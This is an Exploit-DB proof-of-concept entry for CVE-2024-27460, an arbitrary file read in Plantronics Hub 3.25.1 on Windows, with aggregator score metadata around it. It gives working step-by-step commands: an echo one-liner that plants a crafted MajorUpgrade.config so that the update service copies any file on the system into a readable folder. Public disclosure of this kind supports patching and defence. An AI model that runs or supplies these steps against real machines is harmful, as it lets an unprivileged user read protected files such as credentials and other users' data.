Lucene search

K
exploitdbAlaa KachouhEDB-ID:52011
HistoryMay 13, 2024 - 12:00 a.m.

Plantronics Hub 3.25.1 - Arbitrary File Read

2024-05-1300:00:00
Alaa Kachouh
www.exploit-db.com
54
plantronics hub
arbitrary file read
windows 10/11
cve-2024-27460
deloitte belgium
mastercard
exploit

7.2 High

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

8.7%

# Exploit Title: Plantronics Hub 3.25.1 – Arbitrary File Read
# Date: 2024-05-10
# Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh from
Mastercard
# Vendor Homepage:
https://support.hp.com/us-en/document/ish_9869257-9869285-16/hpsbpy03895
# Version: Plantronics Hub for Windows version 3.25.1
# Tested on: Windows 10/11
# CVE : CVE-2024-27460

As a regular user drop a file called "MajorUpgrade.config" inside the
"C:\ProgramData\Plantronics\Spokes3G" directory. The content of
MajorUpgrade.config should look like the following one liner:
^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config

Exchange <FULL-PATH-TO-YOUR-DESIRED-FILE> with a desired file to read/copy
(any file on the system). The desired file will be copied into C:\Program
Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp

Steps to reproduce (POC):
- Open cmd.exe
- Navigate using cd C:\ProgramData\Plantronics\Spokes3G
- echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
- Desired file will be copied into C:\Program Files
(x86)\Plantronics\Spokes3G\UpdateServiceTemp

7.2 High

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

8.7%